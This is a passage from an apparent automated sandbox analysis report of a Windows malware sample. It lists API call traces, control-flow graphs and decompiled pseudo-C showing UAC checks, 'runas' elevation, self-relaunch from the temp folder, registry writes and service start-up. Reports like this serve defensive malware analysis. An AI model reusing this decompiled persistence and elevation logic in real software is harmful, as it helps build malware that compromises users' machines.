                                                                                                                                  0x00409e38
                                                                                                                                  0x00000000
                                                                                                                                  0x00409e38
                                                                                                                                  0x00409df9
                                                                                                                                  0x00409dfd
                                                                                                                                  0x00409dff
                                                                                                                                  0x00409dff
                                                                                                                                  0x00409e04
                                                                                                                                  0x00000000
                                                                                                                                  0x00409e04
                                                                                                                                  0x00409d1d
                                                                                                                                  0x00409d1d
                                                                                                                                  0x00409d23
                                                                                                                                  0x00409d2a
                                                                                                                                  0x00409d2d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409d2d
                                                                                                                                  0x00000000
                                                                                                                                  0x00409d23
                                                                                                                                  0x00409d1b
                                                                                                                                  0x00409cec
                                                                                                                                  0x00409c81
                                                                                                                                  0x00409c3f
                                                                                                                                  0x00409b47
                                                                                                                                  0x00409b4a
                                                                                                                                  0x00409b4d
                                                                                                                                  0x00409b56
                                                                                                                                  0x00409b8b
                                                                                                                                  0x00409b91
                                                                                                                                  0x00409b92
                                                                                                                                  0x00409b94
                                                                                                                                  0x00409b9f
                                                                                                                                  0x00409b9f
                                                                                                                                  0x00409b9f
                                                                                                                                  0x00409ba4
                                                                                                                                  0x00409ba4
                                                                                                                                  0x00409bb3
                                                                                                                                  0x00409bb8
                                                                                                                                  0x00409bbf
                                                                                                                                  0x00409bbf
                                                                                                                                  0x00409bc2
                                                                                                                                  0x00409bc8
                                                                                                                                  0x00409bde
                                                                                                                                  0x00409be3
                                                                                                                                  0x00409be8
                                                                                                                                  0x00409bfa
                                                                                                                                  0x00409bff
                                                                                                                                  0x00409c02
                                                                                                                                  0x00409c02
                                                                                                                                  0x00409be8
                                                                                                                                  0x00000000
                                                                                                                                  0x00409bc8
                                                                                                                                  0x00409b58
                                                                                                                                  0x00409b5e
                                                                                                                                  0x00409b64
                                                                                                                                  0x00409b67
                                                                                                                                  0x00000000
                                                                                                                                  0x00409b69
                                                                                                                                  0x00409b6b
                                                                                                                                  0x00409b7a
                                                                                                                                  0x00409b7f
                                                                                                                                  0x00000000
                                                                                                                                  0x00409b7f
                                                                                                                                  0x00409b67

                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                                                                  • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A
                                                                                                                                    • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                    • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                    • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00409C06
                                                                                                                                  • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                                                                  • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                                                                  • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                                                                  • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                                                                  • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                                                                  • wsprintfA.USER32 ref: 0040A0B6
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                                                                  • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                                                                  • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                                                                    • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                                                                    • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                                                                    • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                                                                  • DeleteFileA.KERNEL32(004133D8), ref: 0040A407
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040A42C
                                                                                                                                  • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040A469
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                                                                  • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                                                                  • String ID: "$"$"$%X%08X$0 v$D$P$PromptOnSecureDesktop$\
                                                                                                                                  • API String ID: 2089075347-2566440486
                                                                                                                                  • Opcode ID: c894b1530cc35010d23fccc7ef5158d33aa5e0c8bcfee394fb4dde1fc96a0a24
                                                                                                                                  • Instruction ID: 03c383f258a4670438db1d87b8f5ad655fb57d32e75deaea02eb898f73f6b462
                                                                                                                                  • Opcode Fuzzy Hash: c894b1530cc35010d23fccc7ef5158d33aa5e0c8bcfee394fb4dde1fc96a0a24
                                                                                                                                  • Instruction Fuzzy Hash: EC5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409326 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 284registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 497 409326-409348 call 401910 GetVersionExA 500 409358-40935c 497->500 501 40934a-409356 497->501 502 409360-40937d GetModuleHandleA GetModuleFileNameA 500->502 501->502 503 409385-4093a2 502->503 504 40937f 502->504 505 4093a4-4093d7 call 402544 wsprintfA 503->505 506 4093d9-409412 call 402544 wsprintfA 503->506 504->503 511 409415-40942c call 40ee2a 505->511 506->511 514 4094a3-4094b3 call 406edd 511->514 515 40942e-409432 511->515 520 4094b9-4094f9 call 402544 RegOpenKeyExA 514->520 521 40962f-409632 514->521 515->514 516 409434-4094a0 call 406cc9 call 40ef00 call 402544 call 40ef1e call 402544 wsprintfA call 40ee2a 515->516 516->514 531 409502-40952e call 402544 RegQueryValueExA 520->531 532 4094fb-409500 520->532 523 409634-409637 521->523 526 409639-40964a call 401820 523->526 527 40967b-409682 523->527 540 40964c-409662 526->540 541 40966d-409679 526->541 534 409683 call 4091eb 527->534 550 409530-409537 531->550 551 409539-409565 call 402544 RegQueryValueExA 531->551 536 40957a-40957f 532->536 544 409688-409690 534->544 545 409581-409584 536->545 546 40958a-40958d 536->546 548 409664-40966b 540->548 549 40962b-40962d 540->549 541->534 553 409692 544->553 554 409698-4096a0 544->554 545->523 545->546 546->527 547 409593-40959a 546->547 555 40961a-40961f 547->555 556 40959c-4095a1 547->556 548->549 560 4096a2-4096a9 549->560 557 40956e-409577 RegCloseKey 550->557 551->557 566 409567 551->566 553->554 554->560 564 409625 555->564 556->555 561 4095a3-4095c0 call 40f0e4 556->561 557->536 570 4095c2-4095db call 4018e0 561->570 571 40960c-409618 561->571 564->549 566->557 570->560 574 4095e1-4095f9 570->574 571->564 574->560 575 4095ff-409607 574->575 575->560
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				long _t107;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161); // executed
						L39:
						_t96 = E004091EB(); // executed
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x5e0d0000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				_t107 = RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50); // executed
				if(_t107 == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c); // executed
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c); // executed
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x5e0d0106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x5e0d0107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x5e0d0000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}





























                                                                                                                                  0x00409326
                                                                                                                                  0x00409327
                                                                                                                                  0x00409330
                                                                                                                                  0x00409339
                                                                                                                                  0x00409348
                                                                                                                                  0x00409358
                                                                                                                                  0x0040935c
                                                                                                                                  0x0040935c
                                                                                                                                  0x0040935c
                                                                                                                                  0x0040934a
                                                                                                                                  0x00409353
                                                                                                                                  0x00409353
                                                                                                                                  0x00409375
                                                                                                                                  0x0040937d
                                                                                                                                  0x0040937f
                                                                                                                                  0x0040937f
                                                                                                                                  0x0040938c
                                                                                                                                  0x00409394
                                                                                                                                  0x004093a2
                                                                                                                                  0x004093d9
                                                                                                                                  0x004093dc
                                                                                                                                  0x004093dd
                                                                                                                                  0x004093e0
                                                                                                                                  0x004093e3
                                                                                                                                  0x004093e6
                                                                                                                                  0x004093e9
                                                                                                                                  0x004093ec
                                                                                                                                  0x0040940c
                                                                                                                                  0x00409412
                                                                                                                                  0x004093a4
                                                                                                                                  0x004093a4
                                                                                                                                  0x004093a5
                                                                                                                                  0x004093a8
                                                                                                                                  0x004093ab
                                                                                                                                  0x004093ae
                                                                                                                                  0x004093b1
                                                                                                                                  0x004093ce
                                                                                                                                  0x004093d4
                                                                                                                                  0x004093d4
                                                                                                                                  0x0040941d
                                                                                                                                  0x00409420
                                                                                                                                  0x00409425
                                                                                                                                  0x0040942c
                                                                                                                                  0x00409441
                                                                                                                                  0x0040945d
                                                                                                                                  0x0040946b
                                                                                                                                  0x0040948d
                                                                                                                                  0x0040949b
                                                                                                                                  0x004094a0
                                                                                                                                  0x004094a0
                                                                                                                                  0x004094a3
                                                                                                                                  0x004094b0
                                                                                                                                  0x004094b3
                                                                                                                                  0x0040962f
                                                                                                                                  0x00409632
                                                                                                                                  0x00409632
                                                                                                                                  0x00409634
                                                                                                                                  0x00409634
                                                                                                                                  0x00409637
                                                                                                                                  0x0040967b
                                                                                                                                  0x00409681
                                                                                                                                  0x00409682
                                                                                                                                  0x00409683
                                                                                                                                  0x00409683
                                                                                                                                  0x0040968a
                                                                                                                                  0x00409690
                                                                                                                                  0x00409692
                                                                                                                                  0x00409692
                                                                                                                                  0x00409692
                                                                                                                                  0x0040969a
                                                                                                                                  0x0040969d
                                                                                                                                  0x0040969d
                                                                                                                                  0x004096a0
                                                                                                                                  0x004096a2
                                                                                                                                  0x004096a9
                                                                                                                                  0x004096a9
                                                                                                                                  0x00409641
                                                                                                                                  0x00409648
                                                                                                                                  0x0040964a
                                                                                                                                  0x00409673
                                                                                                                                  0x00409674
                                                                                                                                  0x00000000
                                                                                                                                  0x00409674
                                                                                                                                  0x00409652
                                                                                                                                  0x00409652
                                                                                                                                  0x00409657
                                                                                                                                  0x0040965c
                                                                                                                                  0x00409662
                                                                                                                                  0x00409666
                                                                                                                                  0x00409666
                                                                                                                                  0x0040962b
                                                                                                                                  0x0040962b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040962b
                                                                                                                                  0x004094ce
                                                                                                                                  0x004094d5
                                                                                                                                  0x004094dc
                                                                                                                                  0x004094e3
                                                                                                                                  0x004094e8
                                                                                                                                  0x004094f1
                                                                                                                                  0x004094f9
                                                                                                                                  0x0040951a
                                                                                                                                  0x0040951f
                                                                                                                                  0x00409526
                                                                                                                                  0x0040952c
                                                                                                                                  0x0040952e
                                                                                                                                  0x00409551
                                                                                                                                  0x00409556
                                                                                                                                  0x0040955d
                                                                                                                                  0x00409563
                                                                                                                                  0x00409565
                                                                                                                                  0x00409567
                                                                                                                                  0x00409567
                                                                                                                                  0x00409530
                                                                                                                                  0x00409530
                                                                                                                                  0x00409530
                                                                                                                                  0x00409571
                                                                                                                                  0x00409577
                                                                                                                                  0x004094fb
                                                                                                                                  0x004094fb
                                                                                                                                  0x004094fb
                                                                                                                                  0x0040957a
                                                                                                                                  0x0040957f
                                                                                                                                  0x0040958d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409597
                                                                                                                                  0x0040959a
                                                                                                                                  0x0040961a
                                                                                                                                  0x0040961f
                                                                                                                                  0x0040961f
                                                                                                                                  0x00000000
                                                                                                                                  0x004095a3
                                                                                                                                  0x004095c0
                                                                                                                                  0x0040960c
                                                                                                                                  0x00409612
                                                                                                                                  0x00409625
                                                                                                                                  0x00409625
                                                                                                                                  0x00000000
                                                                                                                                  0x00409625
                                                                                                                                  0x004095d1
                                                                                                                                  0x004095db
                                                                                                                                  0x004095e7
                                                                                                                                  0x004095ed
                                                                                                                                  0x004095f3
                                                                                                                                  0x004095f9
                                                                                                                                  0x00409601
                                                                                                                                  0x00409601
                                                                                                                                  0x004095f9
                                                                                                                                  0x00000000
                                                                                                                                  0x004095db
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                                                                  • wsprintfA.USER32 ref: 004093CE
                                                                                                                                  • wsprintfA.USER32 ref: 0040940C
                                                                                                                                  • wsprintfA.USER32 ref: 0040948D
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                                                                  • String ID: PromptOnSecureDesktop$runas
                                                                                                                                  • API String ID: 3696105349-2220793183
                                                                                                                                  • Opcode ID: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
                                                                                                                                  • Instruction ID: 6752aeb10d98b7ea2ac03540c689f78e3d44a0922e5129ac444c5da45af1d8ff
                                                                                                                                  • Opcode Fuzzy Hash: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
                                                                                                                                  • Instruction Fuzzy Hash: 5EA181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406A60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 614 406a60-406a89 CreateFileA 615 406b8c-406ba1 GetLastError 614->615 616 406a8f-406ac3 GetDiskFreeSpaceA 614->616 617 406ba3-406ba6 615->617 618 406ac5-406adc call 40eb0e 616->618 619 406b1d-406b34 call 406987 616->619 618->619 626 406ade 618->626 624 406b56-406b63 FindCloseChangeNotification 619->624 625 406b36-406b54 GetLastError CloseHandle 619->625 628 406b65-406b7d GetLastError CloseHandle 624->628 629 406b86-406b8a 624->629 627 406b7f-406b80 DeleteFileA 625->627 630 406ae0-406ae5 626->630 631 406ae7-406afb call 40eca5 626->631 627->629 628->627 629->617 630->631 632 406afd-406aff 630->632 631->619 632->619 635 406b01 632->635 636 406b03-406b08 635->636 637 406b0a-406b17 call 40eca5 635->637 636->619 636->637 637->619
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				int _t42;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x5e0d0101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				_t42 = GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32); // executed
				if(_t42 == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63); // executed
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = FindCloseChangeNotification(_v12); // executed
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x5e0d0103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x5e0d0102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}






















                                                                                                                                  0x00406a60
                                                                                                                                  0x00406a68
                                                                                                                                  0x00406a7d
                                                                                                                                  0x00406a83
                                                                                                                                  0x00406a89
                                                                                                                                  0x00406b8c
                                                                                                                                  0x00406b9c
                                                                                                                                  0x00406ba1
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ba1
                                                                                                                                  0x00406a91
                                                                                                                                  0x00406a97
                                                                                                                                  0x00406a9e
                                                                                                                                  0x00406aa1
                                                                                                                                  0x00406ab8
                                                                                                                                  0x00406abb
                                                                                                                                  0x00406ac3
                                                                                                                                  0x00406b1d
                                                                                                                                  0x00406b27
                                                                                                                                  0x00406b2f
                                                                                                                                  0x00406b34
                                                                                                                                  0x00406b5f
                                                                                                                                  0x00406b61
                                                                                                                                  0x00406b63
                                                                                                                                  0x00406b86
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b89
                                                                                                                                  0x00406b65
                                                                                                                                  0x00406b78
                                                                                                                                  0x00406b7d
                                                                                                                                  0x00406b7f
                                                                                                                                  0x00406b80
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b80
                                                                                                                                  0x00406b36
                                                                                                                                  0x00406b49
                                                                                                                                  0x00406b4e
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b4e
                                                                                                                                  0x00406ad2
                                                                                                                                  0x00406ad7
                                                                                                                                  0x00406ada
                                                                                                                                  0x00406adc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ade
                                                                                                                                  0x00406af5
                                                                                                                                  0x00406af5
                                                                                                                                  0x00000000
                                                                                                                                  0x00406afd
                                                                                                                                  0x00406afd
                                                                                                                                  0x00406aff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b01
                                                                                                                                  0x00406b0a
                                                                                                                                  0x00406b17
                                                                                                                                  0x00406b17
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b17
                                                                                                                                  0x00406b03
